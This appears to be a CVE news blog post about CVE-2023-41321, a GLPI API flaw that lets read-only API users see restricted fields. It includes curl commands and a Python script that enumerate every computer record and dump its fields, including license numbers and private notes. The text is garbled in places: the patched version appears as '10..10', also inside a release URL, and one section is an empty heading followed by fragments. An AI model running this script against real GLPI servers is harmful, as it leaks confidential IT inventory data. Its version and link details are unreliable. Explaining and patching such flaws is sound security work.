CVE CyberSecurity Database News

CVE-2023-41321 - API Data Leakage in GLPI—What You Need to Know (With Exploit Example)

Poster -

GLPI stands for "Gestionnaire Libre de Parc Informatique." It's a free, open-source Asset and IT Management software widely used to keep track of computers, servers, software, licenses, and much more. Companies love GLPI because it provides easy features for managing IT resources, keeping records, and has helpdesk functions based on ITIL standards.

However, in 2023, a serious vulnerability surfaced in GLPI's API (Application Programming Interface). This flaw, CVE-2023-41321, lets users with read-only API access extract sensitive values they shouldn’t see.

This post will break down the issue, explain how it can be exploited (with code!), and tell you how to fix or avoid it.

What is CVE-2023-41321?

GLPI lets users connect and interact with their assets via an API. APIs are powerful, but if not secured properly, they can leak information.

CVE-2023-41321 is a vulnerability that allows an authenticated API user (even with just "read access") to enumerate and grab sensitive field values from resources they can read—sometimes exposing more information than intended.

Severity: Medium (because an attacker needs API access, but the info leaked could be sensitive)

Technical Details: How Does the Vulnerability Work?

Let's say there's a GLPI user with API access that's *not* supposed to know confidential details like license keys, hidden asset properties, or private notes. Due to incomplete access checks in GLPI's API, this user could run certain API queries to "enumerate" (list out) values of fields, some of which are meant to be off-limits.

The problem: When the API assembles resource details in its response, it sometimes skips access or privacy checks for individual fields—revealing everything that is readable for its role, including sensitive data that should remain secret.

Exploit Example: Enumerating Sensitive Data

Let's demonstrate a typical exploit scenario. Assume your API access token is API_TOKEN_HERE. The API is at http://glpi-server.local/apirest.php/.

1. List All Computers

curl -H 'Authorization: user_token API_TOKEN_HERE' \
     http://glpi-server.local/apirest.php/Computer

### 2. Request Details with Hidden/Sensitive Fields

Suppose you have a computer with ID 1. You want to fetch its attributes, even ones not displayed in the web UI.

curl -H 'Authorization: user_token API_TOKEN_HERE' \
     'http://glpi-server.local/apirest.php/Computer/1?expand_dropdowns=true'

Other sensitive fields

Even if your user *should not* see all fields (e.g., private comments or software audit logs), you will get them if you have read (but not write) access.

Allows company-wide enumeration of sensitive info with just API read access

- Could aid social engineering or lateral movement by giving an attacker more data about infrastructure

How Can Attackers Abuse This? Example Script

Below is a Python snippet that will enumerate all "Computer" resource IDs and dump sensitive fields for each.

import requests

API_URL = "http://glpi-server.local/apirest.php/"
HEADERS = {
    'Authorization': 'user_token API_TOKEN_HERE',
    'App-Token': 'APP_TOKEN_HERE'  # needed if App-Token security is enabled
}

# Get the list of computer asset IDs
computers = requests.get(API_URL + 'Computer', headers=HEADERS).json()

for comp in computers:
    comp_id = comp['id']
    details = requests.get(
        API_URL + f'Computer/{comp_id}?expand_dropdowns=true',
        headers=HEADERS
    ).json()
    print(f"== Computer {comp_id} ==")
    print(details)

*You may find fields like serial, notes, os_license_number, etc., in the API output, even for users not authorized to see them!*

Is There a Patch? How Do I Fix It?

YES! The developers patched this in GLPI version 10..10. If you are running any earlier version, you are at risk.

Upgrade immediately to 10..10 or later.

> No workarounds exist (e.g., you cannot fix this with just configuration changes).

Upgrade instructions and downloads:
- Official GLPI Site: https://glpi-project.org/
- 10..10 Release Notes: https://github.com/glpi-project/glpi/releases/tag/10..10

References and More Information

- NVD CVE-2023-41321 Entry
- GLPI GitHub Security Advisory
- GLPI Official Website

Final Thoughts

CVE-2023-41321 shows how API permissions can be tricky. Always keep your software updated and review what API users can really do or see—especially in business-critical tools like GLPI.

If you use GLPI, upgrade NOW. If you're a sysadmin or security consultant, check your GLPI API users and review logs for unusual data access.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/29/2023 18:13:00 UTC